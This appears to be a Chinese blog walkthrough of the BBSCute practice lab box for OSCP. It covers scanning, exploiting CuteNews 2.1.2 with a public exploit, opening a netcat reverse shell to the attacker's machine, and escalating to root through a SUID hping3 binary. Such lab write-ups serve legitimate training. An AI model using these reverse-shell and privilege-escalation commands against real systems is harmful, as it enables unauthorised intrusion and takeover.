OSCP BBSCute 详细教学

BBSCute
ip 192.168.51.128
后面ip变了是因为又开了一次靶机

打点

开扫
在这里插入图片描述

88 http
110 pop3
995 ssl/pop3
开始目录扫描,东西好多,醉了
在这里插入图片描述

找到一个登录框(并不是一开始就找到这个的,翻了挺久),还点了注册,发现注册不了,因为根本就没有验证码
发现框架是CuteNews 2.1.2 ,去网上找有没有公开的exp。
在这里插入图片描述

有一个是python脚本,直接拿过来试试。
直接复制这个exp,在kali桌面新建一个.py的文件。我这里叫1.py,然后直接用命令行运行
在这里插入图片描述

报错了,去看看问题在哪
在这里插入图片描述

会发现这里的url是CuteNews/cadaes啥啥的,但是我们去网站会发现目录是index.php啥的,说明这个网站的默认路径应该是有CuteNews的,但是这个靶机把它给改掉了,所以说这个exp需要修改一下,就是把有这个CuteNews的地方都删掉。一共是5个地方。
如果觉得用百度看起来不高级的话,也可以用kali自带的exp
searchsploit cutenews
在这里插入图片描述

cd /usr/share/exploitdb/exploits/php/webapps/
这个是文档的路径,可以记一下的
然后把他复制到桌面就可以了
在这里插入图片描述

直接命令行
python 1.py
输入url不用加目录 http://192.168.52.128
在这里插入图片描述

直接就有了一个低权限的shell,为了防止掉,我们先把shell弹到kali上
shell:nc -e /bin/bash 192.168.49.52 6666 这里的ip填的是kali的IP
这条命令的意思是:通过Netcat,尝试与 IP 地址为 192.168.49.52,端口号为 6666 的服务器进行连接,并在连接成功后,执行 /bin/bash 程序。这实际上是在创建一个反向Shell连接,这种连接允许远程主机访问和控制执行该命令的设备的 Shell。
kali: nc -nlvp 6666
使用 Netcat 工具以监听模式启动,监听端口号 6666
在这里插入图片描述

发现前面啥都没有,说明还是不够稳定,用python创建一个稳定的shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
在这里插入图片描述在这里插入图片描述

提权

接下来开始提权
输入命令find / -type f -user root -perm -4000 2>/dev/null
在这里插入图片描述

意思是:从根目录开始查找所有属于root用户且设置了SUID属性的普通文件
在这里插入图片描述

找到了这些文件,其中这个hping3,比较陌生,把他拎出来放在一个查提权命令的网站,你也可以每个都试试。
https://gtfobins.github.io/ 打靶必备
在这里插入图片描述

输入hping3就直接是root了。妙
在这里插入图片描述
完结撒花!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值